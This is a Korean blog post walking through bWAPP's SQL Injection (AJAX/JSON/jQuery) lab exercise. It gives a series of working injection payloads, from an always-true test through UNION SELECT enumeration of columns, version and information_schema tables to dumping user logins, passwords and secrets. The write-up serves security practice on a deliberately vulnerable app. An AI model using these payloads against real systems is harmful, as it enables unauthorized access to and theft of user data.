bWAPP 16. SQL Injection (AJAX JSON jQuery)

2022. 2. 10. 01:57·Web hacking

                                           SQL Injection (AJAX JSON jQuery)

 

AJAX(Asynchronous javaScript and XML)는 HTML, 자바스크립트, JSON을 혼합하여 사용하는 기술을 말한다.

JSON(JavaScript Object Notation)은 웹 서버와 데이터를 주고 받을 때 데이터를 표현하는 방법을 뜻하는데,

자바스크립트 형식으로 객체를 표현한다.

JQuery는 자바스크립트 라이브러리 중 하나로, 클라이언트에서 스크립트 언어를 사용할 때 이를 단순화하고

AJAX 기능도 제공 한다.

 

밑 블로그의 정의를 참고했다.

출처: https://lucete1230-cyberpolice.tistory.com/90 [I-Tstory]

 

아무 글자를 입력하더라도 결과가 출력되는 것을 확인할 수 있다.

 

 

[ 공격 가능 확인 ]

입력 값 : ' or 1=1#

 

 

 

 

[ 컬럼 수 확인 ]

입력 값 : 0' union select all 1,2,3,4,5,6,7#

 

 

 

 

 

[ 버전 확인 ]

입력 값 : 0' union select all 1,@@version,database(),4,5,6,7#

 

 

 

 

 

[ 테이블 명 확인하기 ]

입력 값 :  0' UNION SELECT ALL 1, table_name,3,4,5,6,7 from information_schema.tables#

 

 

 

 

 

 

[ user 테이블 컬럼 명 추출 ]

입력 값 :  ' UNION SELECT ALL 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#

 

 

 

 

 

[ user 테이블의 컬럼 내용 확인 ]

입력 값 :  0' union select all 1, concat(id,login),password,email,secret,6,7 from users#

                                       

저작자표시 비영리 변경금지 (새창열림)

'Web hacking' 카테고리의 다른 글

bWAPP 18.SQL Injection (Login Form/Hero)  (0) 2022.02.11
bWAPP 17. SQL Injection (CAPTCHA)  (0) 2022.02.10
bWAPP 15. SQL Injection (POST Select)  (0) 2022.02.07
bWAPP 14. SQL Injection (POST Search)  (0) 2022.02.06
bWAPP 13. SQL Injection (GET/Select)  (0) 2022.02.06
'Web hacking' 카테고리의 다른 글
  • bWAPP 18.SQL Injection (Login Form/Hero)
  • bWAPP 17. SQL Injection (CAPTCHA)
  • bWAPP 15. SQL Injection (POST Select)
  • bWAPP 14. SQL Injection (POST Search)
taktaks
taktaks
보안 연습 일기장입니다. 모든 연습은 불법적인 용도로 사용하지 말아주시길 부탁드립니다. 용무는 wndudxkr2005@gmail.com 메일 부탁드립니다.
  • taktaks
    taktaks
    taktaks
  • 전체
    오늘
    어제
    • 보안 일지 (280)
      • 네트워크 구축 (12)
      • 리눅스 보안구축 (10)
      • 파이썬 기본 (11)
      • Web hacking (39)
      • 통합 인프라 보안 (41)
      • 공격기법 및 탐지 (33)
      • 악성코드 및 포렌식 (93)
      • 리버싱 (5)
      • 시스템 해킹 (20)
      • C 언어 (12)
  • 블로그 메뉴

    • 링크

    • 공지사항

    • 인기 글

    • 태그

      프롯
    • 최근 댓글

    • 최근 글

    • hELLO· Designed By정상우.v4.10.3
    taktaks
    bWAPP 16. SQL Injection (AJAX JSON jQuery)
    상단으로

    티스토리툴바